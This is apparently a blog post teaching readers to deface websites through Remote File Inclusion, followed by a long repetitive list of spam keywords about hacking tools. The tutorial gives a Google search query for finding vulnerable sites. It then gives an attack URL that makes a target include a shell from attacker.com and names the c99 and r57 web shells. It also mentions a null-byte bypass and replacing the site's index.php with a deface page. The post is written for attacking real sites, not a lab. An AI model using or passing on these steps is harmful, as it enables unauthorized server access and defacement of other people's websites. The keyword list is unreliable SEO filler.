viernes, 2 de junio de 2023

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related word
  1. Hacker Hardware Tools
  2. World No 1 Hacker Software
  3. Hack Tools For Mac
  4. Hack Tools For Pc
  5. Pentest Tools Subdomain
  6. Pentest Tools Nmap
  7. Pentest Tools
  8. Tools For Hacker
  9. Hack Tool Apk No Root
  10. How To Make Hacking Tools
  11. Pentest Tools Tcp Port Scanner
  12. Nsa Hacker Tools
  13. Hackrf Tools
  14. Hacker Tools Software
  15. Hack And Tools
  16. Hack Tools Github
  17. New Hacker Tools
  18. Hacking Tools For Windows
  19. Hacker Search Tools
  20. Pentest Tools Download
  21. Pentest Tools Subdomain
  22. Hacker Tools Mac
  23. Hacking Tools For Kali Linux
  24. Pentest Tools Apk
  25. Pentest Tools Bluekeep
  26. Pentest Tools Website Vulnerability
  27. Hacking Tools Kit
  28. Pentest Tools Open Source
  29. Hacker Tools Linux
  30. Beginner Hacker Tools
  31. Hacking Tools 2019
  32. Tools 4 Hack
  33. Nsa Hack Tools
  34. Pentest Tools Linux
  35. Hacker Tools Online
  36. Hack Tools Github
  37. Hacking Tools For Games
  38. New Hacker Tools
  39. Nsa Hack Tools
  40. Pentest Tools Port Scanner
  41. Kik Hack Tools
  42. Hacking Tools For Mac
  43. Hak5 Tools
  44. Pentest Automation Tools
  45. Hacker
  46. Hacker Search Tools
  47. Hacking Tools Usb
  48. Tools Used For Hacking
  49. Blackhat Hacker Tools
  50. Pentest Tools Alternative
  51. Hacking Tools Pc
  52. Hacker Tools 2020
  53. How To Install Pentest Tools In Ubuntu
  54. Nsa Hack Tools
  55. Beginner Hacker Tools
  56. Pentest Tools Tcp Port Scanner
  57. Install Pentest Tools Ubuntu
  58. Hacking Tools For Pc
  59. Hacker Tools Github
  60. Hacker Tools Software
  61. Tools For Hacker
  62. Hack Tools For Pc
  63. Game Hacking
  64. Tools For Hacker
  65. Hacking Tools Mac
  66. Game Hacking
  67. Hacker Tools Windows
  68. Pentest Tools Port Scanner
  69. Pentest Tools Download
  70. Pentest Tools Website Vulnerability
  71. Top Pentest Tools
  72. Pentest Tools Download
  73. Hacker Tools Windows
  74. Hack And Tools
  75. Pentest Tools For Windows
  76. Pentest Tools Kali Linux
  77. Hack Tools 2019
  78. Pentest Tools Website Vulnerability
  79. Hacker Security Tools
  80. Hack Tools
  81. Hacker Tools Github
  82. Pentest Tools Android
  83. Ethical Hacker Tools
  84. Hacking Tools 2020
  85. New Hack Tools
  86. Pentest Tools For Ubuntu
  87. Hack Tools Mac
  88. World No 1 Hacker Software
  89. Nsa Hacker Tools
  90. Hacker Tools Hardware
  91. Wifi Hacker Tools For Windows
  92. Hack Apps
  93. Game Hacking
  94. Hacker Tools List
  95. Hacking Tools For Beginners
  96. Hacks And Tools
  97. Hacking Tools 2020
  98. Pentest Tools Bluekeep
  99. Tools For Hacker
  100. Hacking Tools For Windows
  101. Hack Tools Mac
  102. Hacking Tools For Kali Linux
  103. How To Hack
  104. Bluetooth Hacking Tools Kali
  105. Hacker Hardware Tools
  106. Nsa Hack Tools
  107. Hacking App
  108. World No 1 Hacker Software
  109. Hacking Tools Mac
  110. Hacking Tools Mac
  111. Hacker Tools For Ios
  112. Hacker Techniques Tools And Incident Handling
  113. Nsa Hacker Tools
  114. Hackers Toolbox
  115. Hacking Tools Usb
  116. Nsa Hacker Tools
  117. Hacker Tools Apk Download
  118. What Is Hacking Tools
  119. Hacker Tool Kit
  120. Blackhat Hacker Tools
  121. Growth Hacker Tools
  122. Hack Tools 2019
  123. How To Make Hacking Tools
  124. Wifi Hacker Tools For Windows
  125. Hack And Tools
  126. Hacking Tools Mac
  127. Hacker Tools List
  128. Install Pentest Tools Ubuntu
  129. Hacking Tools Software
  130. Hacker Tools Github
  131. Hacking Tools Windows 10
  132. Pentest Tools For Ubuntu
  133. Hacking Tools Online

No hay comentarios.: